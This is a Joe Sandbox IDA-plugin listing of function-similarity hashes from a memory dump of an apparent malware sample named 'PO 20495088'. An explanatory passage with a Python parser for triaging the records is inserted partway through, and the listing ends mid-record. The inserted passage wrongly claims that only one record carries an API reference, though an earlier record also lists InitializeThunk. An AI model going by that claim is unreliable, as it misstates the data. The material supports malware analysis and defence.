                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 068e6ee9499eff1233581a679f8af6cdb8604b09b01ac9128919b0508c10dc8c
                                                                                                        • Instruction ID: 1aaeaac5c1aaff8e66f6a53c612770e6f739830d1e2a7e43cfe896a6cdaa6571
                                                                                                        • Opcode Fuzzy Hash: 068e6ee9499eff1233581a679f8af6cdb8604b09b01ac9128919b0508c10dc8c
                                                                                                        • Instruction Fuzzy Hash: 0501D432704505DBD715DF6DDC049AAFBA8EF84620F554069AA01D7748DE20DD01C691
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b4f1436bb40a72dcf6ad190ca7f237cc3ed2169eed029c05268ce02366228df4
                                                                                                        • Instruction ID: 9643851afc86920bee7aeb505b05d1b2fd716732fee28613690e753983e23e44
                                                                                                        • Opcode Fuzzy Hash: b4f1436bb40a72dcf6ad190ca7f237cc3ed2169eed029c05268ce02366228df4
                                                                                                        • Instruction Fuzzy Hash: 4E018F72280601AFD3325E19D840F12FBACEF55F60F15482EB7069F395DAB1A9808B64
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 413bc9db31fd2d50276a41f944f5f0e90724df6b13a8614a84f82354d33fc0e7
                                                                                                        • Instruction ID: 81e14436c8fc2b617fb630c0be8e8e3f5ff75fa268aa972dde71537a57545851
                                                                                                        • Opcode Fuzzy Hash: 413bc9db31fd2d50276a41f944f5f0e90724df6b13a8614a84f82354d33fc0e7
                                                                                                        • Instruction Fuzzy Hash: 20F0F433641A20B7C7319B5B8D54F07FEA9EBC8A90F148068E6159B641CA30ED02CAB0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                        • Instruction ID: 019cd12b3c5105ac28fad1716bfe4367ee017775113e331d62d091b4e8a82436
                                                                                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                        • Instruction Fuzzy Hash: E5F0C2B2600611ABD329CF4DDC40E57FBEEDBD5A80F048128A605CB220EA31DD04CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                        • Instruction ID: 217922703f6ab6ed5de3c0742766ab48d9c46137f9e93039b42e1f895cd3b75b
                                                                                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                        • Instruction Fuzzy Hash: 0BF0FC332846339BD73316DD4844B2BE9A59FD5A64F190035E3059B64CC9648D0296D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                        • Instruction ID: d968c339aa1af2c8bc1be23335b240b4fdf5c8bce0b0b2e360467d5080d0ca01
                                                                                                        • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                        • Instruction Fuzzy Hash: DD01D1322006899BE7339A1DD809F59FF9CEF82750F0840A5FE048B6A2D6B9C940C211
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ec91811768f02e0dc22296ed77c0ffd2239f86bf82693c2e742c81600dfa52eb
                                                                                                        • Instruction ID: 997b6274db155394ba407b4ce512b1698fcab90bb81a88d9fc1a5f79fa860b5d
                                                                                                        • Opcode Fuzzy Hash: ec91811768f02e0dc22296ed77c0ffd2239f86bf82693c2e742c81600dfa52eb
                                                                                                        • Instruction Fuzzy Hash: A2014F71A102499BDB04DFA9D445AEEFBF8BF58314F14405AF905E7380D774EA01CB94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                        • Instruction ID: 2133fff88e108d98b9560dd47fb93b720d36abd221a950d651d3f203b2ac8da8
                                                                                                        • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                        • Instruction Fuzzy Hash: 23F01D7220001DBFEF019F94DD80DAFBB7EEB99298B144225FA1192160D635DE21ABA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 506e829eefe733ea03986b578c3505c6bcf582bff51d7aef08bf5150777772a9
                                                                                                        • Instruction ID: cf2c4790c0fa310b9fb01b97be5766f6b22d7eb874b5402fe392d204fd253b5e
                                                                                                        • Opcode Fuzzy Hash: 506e829eefe733ea03986b578c3505c6bcf582bff51d7aef08bf5150777772a9
                                                                                                        • Instruction Fuzzy Hash: C7018936100209ABCF129F84D840EDA7F66FB8C654F058201FE1866220C336D970EF81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 864744d2431f03a152796738a1d54b9740cc459c63fe530e657766a03ba76319
                                                                                                        • Instruction ID: 138d7eee5fe1ac6e456812b2190f475259e058310ffa9e14e9e50d25e6044bb7
                                                                                                        • Opcode Fuzzy Hash: 864744d2431f03a152796738a1d54b9740cc459c63fe530e657766a03ba76319
                                                                                                        • Instruction Fuzzy Hash: CBF024B12C42415BF7129AAD8C05F23B2A6E7D0661F65806AEB058F2C9EE70DC0183A4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 08ed9248b2205344f0a3374d06489690e5895445cd5dac81285ae1dfbea11aa9
                                                                                                        • Instruction ID: f2ef92e5e7ba582ce16bfa975856cccacd41821848e1e274f1616e9dee0e9c43
                                                                                                        • Opcode Fuzzy Hash: 08ed9248b2205344f0a3374d06489690e5895445cd5dac81285ae1dfbea11aa9
                                                                                                        • Instruction Fuzzy Hash: 4001A4702406859BF7729B3CDD5CF25B7A8BB81B48FA80190BE02DB6D6D778D542C610
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
• Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
• Instruction ID: 5b87c964090f5d39246ceae1c2e6a39fb10499298dae7ea809f5419499fa6d92
• Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
• Instruction Fuzzy Hash: F5F02E31341D1347EB75AE2E8834B2EEA559FD0F10B05072C9503EB680DF60DC00C790
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
• Instruction ID: 99909d4e9e2ddf5132db178c0006e391ebaee6b863a5b85f99e89df0ffe707d4
• Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
• Instruction Fuzzy Hash: 59F0E2337816129BE3318A4ECC80F16F7A8EFD5A60F9A0274A6049B264CB60EC41CBD0
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1517883762080e5e19b98fb358ba7f5ea7668e1fa72c71499196fb3b6ecfe463
• Instruction ID: a383d9b4f8389978373a29c6b9b7a5c9c01af835587af8184b061d56828def06
• Opcode Fuzzy Hash: 1517883762080e5e19b98fb358ba7f5ea7668e1fa72c71499196fb3b6ecfe463
• Instruction Fuzzy Hash: F2F0AF716193049FC310EF28C445A1AF7E8FF98710F80465ABC98DB398E638EA00CB96
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
• Instruction ID: 1dbe23ff727fd9e16e84fb9ccad1424642bf4cdf163d16b9dc5c6d70982644d0
• Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
• Instruction Fuzzy Hash: DFF0B472650204AFE714DB25CC05F56F7E9EF98350F148078A945D7164FAB0ED11D654
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d5cecee4db37304fbca8994430bf74ae11ca42e9b443d9abdd6ebae9a7c8fc37
• Instruction ID: 70f9cb5a53bbb2a3f80ca55eef6a36f6bef8f92bbd67047e4e8419c4fa071a04
• Opcode Fuzzy Hash: d5cecee4db37304fbca8994430bf74ae11ca42e9b443d9abdd6ebae9a7c8fc37
• Instruction Fuzzy Hash: 1DF0AF70A0020DAFCB04EF69C515AAEF7B8EF58300F008055A905EB389DA38EA01CB50
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b713225cce3b36166a67f29661c01a6463536d824bb117df9ec089f94ba9bb6d
• Instruction ID: 69af19dcc3c832c7e75f1326987f27308af3d58539aa3f38e5f995b16e3b9369
• Opcode Fuzzy Hash: b713225cce3b36166a67f29661c01a6463536d824bb117df9ec089f94ba9bb6d
• Instruction Fuzzy Hash: 4DF0B4319B66F19FE732CB5CC444B62FFD49B01660F09496AD94B87502C7B4D882C651
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 15bc2e398fd4842e1f252265db9421ee2619e26a4e23d8570221692bdbe0569d
• Instruction ID: b38b66196ac84168723303fc9d2600c9266cace9f2a7f51f525bcbe381e8fef4
• Opcode Fuzzy Hash: 15bc2e398fd4842e1f252265db9421ee2619e26a4e23d8570221692bdbe0569d
• Instruction Fuzzy Hash: F7F027A751668507CF325B2C745C3D9FBFAA74A110F2A1489E8E55F209D5F4CA83C720
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 34149453423321291395e97f7fd3819a3172f725e32b460b5e1285cbc3092280
• Instruction ID: e3836e81eb4ad8f4b3ddfb68caa721ebc21f057a8c64aeeb7d9e4806cb52fad0
• Opcode Fuzzy Hash: 34149453423321291395e97f7fd3819a3172f725e32b460b5e1285cbc3092280
• Instruction Fuzzy Hash: E7F052754013458FE3A3CB1CC008B12FBDCDB00BA0F089465CD0283102C2F0EA80CAB1
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
• Instruction ID: 7e3263d9453a14a363c5473b0b566d16ccc8bbe6115ac88821c1d9dc771031dc
• Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
• Instruction Fuzzy Hash: BBE0D8323406012BE7119E598CC4F47B76EDFD6B10F040079BA046F256C9E2DC0983A4
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
• Instruction ID: 1ffcc90f6d9c61fa8edd1dc793de7eee5e53c147195da2c9bce64abc594b2b4d
• Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
• Instruction Fuzzy Hash: 46F030721442049FE3218F0AD984FA2F7F8EB45364F45C065F7099B561D379EC40CBA4
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
• Instruction ID: a60a64a99d899e22b1216288f34a7abc795f78f510e8750659c929e2dea12127
• Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
• Instruction Fuzzy Hash: 26F0ED7A2047599BEF16CF19D040AA9FBA8FB41360F0000D4F8428B312EB31E982CBA0
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
• Instruction ID: 552f34b5ada7150f6e2a44dfebcf9d6d5e01f0ecde9da8496a4823c90d1011ff
• Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
• Instruction Fuzzy Hash: 84E0D832244145ABD3E15B698808B66F7A5EBD47A0F150429EA0A8B150FBF0DDC0C7E8
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
• Instruction ID: dfd35df86792d67f96201709e3282fa6d8929ec0d4ff85dc2ef36d452057e85e
• Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
• Instruction Fuzzy Hash: A1E0DF32A40210BBDB2197998D05F9AFEACDF94FA0F050058BA01EB194E570DE00D690
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 77b374d3576fc3f264ade51420b88eca07fe438d6f3f2890f66dee28470c84bd
• Instruction ID: 83e8d3dac7a5e5fe886ecfa84686662fae01c8a8d531eb4486a056f8794bd155
• Opcode Fuzzy Hash: 77b374d3576fc3f264ade51420b88eca07fe438d6f3f2890f66dee28470c84bd
• Instruction Fuzzy Hash: 08E092321005549BC321BB29DD05F8AB79AEFA0360F114515F15657195CB34A911C788
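The records above are the Joe Sandbox IDA plugin's per-function output for the memory dump of process 6 at 0x16F0000, and only the record just above (InitializeThunk) carries an API reference. To work with a listing like this outside the report viewer, here is an added Python parser written for this page; it is not Joe Sandbox code. It splits the text at each "Memory Dump Source" heading, collects the bullet fields of every record, derives the PID and base address from the snapshot file name (the hcaresult_<pid>_<dump>_<base> layout is inferred from the one name on this page and is an assumption; the "Offset:" fragment of the source-file field is the fallback), and picks out the API-linked functions and the Opcode IDs to pivot on when searching other reports. The sample input is copied from two records on this page, with the indentation an HTML extraction leaves behind.

```python
"""Parse Joe Sandbox IDA-plugin function records ('Memory Dump Source' /
'Similarity' blocks) into dicts. Hypothetical helper for this page, not
Joe Sandbox code; it assumes only the field layout visible in the listing."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: two records copied from the listing on this page.
SAMPLE_LISTING = """\
    Memory Dump Source
    • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
    • Instruction ID: dfd35df86792d67f96201709e3282fa6d8929ec0d4ff85dc2ef36d452057e85e
    • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
    • Instruction Fuzzy Hash: A1E0DF32A40210BBDB2197998D05F9AFEACDF94FA0F050058BA01EB194E570DE00D690
    Memory Dump Source
    • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
    Similarity
    • API ID: InitializeThunk
    • String ID:
    • API String ID: 2994545307-0
    • Opcode ID: 77b374d3576fc3f264ade51420b88eca07fe438d6f3f2890f66dee28470c84bd
    • Instruction ID: 83e8d3dac7a5e5fe886ecfa84686662fae01c8a8d531eb4486a056f8794bd155
    • Opcode Fuzzy Hash: 77b374d3576fc3f264ade51420b88eca07fe438d6f3f2890f66dee28470c84bd
    • Instruction Fuzzy Hash: 08E092321005549BC321BB29DD05F8AB79AEFA0360F114515F15657195CB34A911C788
"""

FIELD_RE = re.compile(r"^\s*•\s*([^:]+?):\s*(.*?)\s*$")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")
# Assumed convention hcaresult_<pid>_<dump#>_<base>_<sample>.jbxd, inferred
# from the single snapshot name on this page (6, 2, 16f0000).
SNAPSHOT_RE = re.compile(r"hcaresult_(\d+)_(\d+)_([0-9a-fA-F]+)_")


def parse_listing(text: str) -> List[Dict[str, str]]:
    """Start a new record at every 'Memory Dump Source' heading and store each
    '• Key: Value' bullet under a snake_case key; empty fields stay ''."""
    records: List[Dict[str, str]] = []
    current: Optional[Dict[str, str]] = None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            key = m.group(1).strip().lower().replace(" ", "_")
            current[key] = m.group(2)
    return records


def dump_region(record: Dict[str, str]) -> Tuple[int, int]:
    """(pid, base address) from the snapshot name; if that layout does not
    match, fall back to the 'Offset:' fragment and report pid as -1."""
    m = SNAPSHOT_RE.search(record.get("snapshot_file", ""))
    if m:
        return int(m.group(1)), int(m.group(3), 16)
    off = OFFSET_RE.search(record.get("source_file", ""))
    return -1, (int(off.group(1), 16) if off else -1)


def functions_with_api(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Records the plugin tied to a named API: the first ones to open when
    triaging an injected region."""
    return [r for r in records if r.get("api_id")]


def opcode_ids(records: List[Dict[str, str]]) -> List[str]:
    """Sorted, de-duplicated Opcode IDs, the value to pivot on across reports."""
    return sorted({r["opcode_id"] for r in records if r.get("opcode_id")})


def consistency_issues(records: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Flag truncated records (a hash field missing, as in a listing cut off
    mid-record) and any record whose Opcode Fuzzy Hash differs from its
    Opcode ID, which are identical in every complete record on this page."""
    required = ("opcode_id", "instruction_id", "opcode_fuzzy_hash", "instruction_fuzzy_hash")
    issues: List[Tuple[int, str]] = []
    for i, r in enumerate(records):
        issues.extend((i, f"missing {k}") for k in required if not r.get(k))
        if r.get("opcode_fuzzy_hash") and r["opcode_fuzzy_hash"] != r.get("opcode_id"):
            issues.append((i, "opcode fuzzy hash != opcode id"))
    return issues


if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    pid, base = dump_region(recs[0])
    print(f"{len(recs)} records from PID {pid}, region 0x{base:X}")
    for r in functions_with_api(recs):
        print("API-linked function:", r["api_id"], r["opcode_id"])
    print("issues:", consistency_issues(recs))
```

Feed it the whole listing (for example the text copied out of the report page) and the truncated final record shows up in `consistency_issues` as a missing Instruction Fuzzy Hash rather than silently disappearing; the Opcode IDs are the stable values to search for in other reports of the same family.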
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
• Instruction ID: e7f0eac7b307b08fe0503c1808118323dcb05bc12d6c18ac38c2e8dfb0195ed1
• Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
• Instruction Fuzzy Hash: D9E01231010651DFE7366F2AD94CB52FBF5FF50711F188C2DA19A125B5CBB598C1DA40
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
• Instruction ID: 2aae1185f700419f3df1cbee61f3558dcaf5011d4f00b1b1e35f1e5636555c3e
• Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
• Instruction Fuzzy Hash: 65E0C2343403058FE715CF19C040B63BBB6BFD5A10F68C1A8A9498F205EB73E842DB40
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fa3257983272d7532ff096f1130c59d343505b1b55c471658987ac0ef5fbefad
• Instruction ID: e4ac01a864fbf92128efd6e28bd6dac35e89403afe83c4868f1576264501d28f
• Opcode Fuzzy Hash: fa3257983272d7532ff096f1130c59d343505b1b55c471658987ac0ef5fbefad
• Instruction Fuzzy Hash: 32D02B328C51706ACFB7E1187C08FD3BF5D9B44220F014870FA0896015E5B4CD8186D4
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
• Instruction ID: 23e93a4554dba31c8fc5995ce1f040ea4c4eff5cd27c866a996a35f405894a57
• Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
• Instruction Fuzzy Hash: 07E0C231008A10EFDB332F19DC08F91F6A5FF94B10F244869E485160AD8774AC81CB45
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 70206bc5a5272c898c3a9705768fca4f0b882c64796c4b67c37ee06081f4e2aa
• Instruction ID: 008354cf0a3a039c0be97cf1249bd8f9cd0f87f891040edbaa3794bc5700ad0d
• Opcode Fuzzy Hash: 70206bc5a5272c898c3a9705768fca4f0b882c64796c4b67c37ee06081f4e2aa
• Instruction Fuzzy Hash: BBE0C2332004606BC321FB5DDD00F4AB39EEFA4360F110221F191876D8CB64ED01C794
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
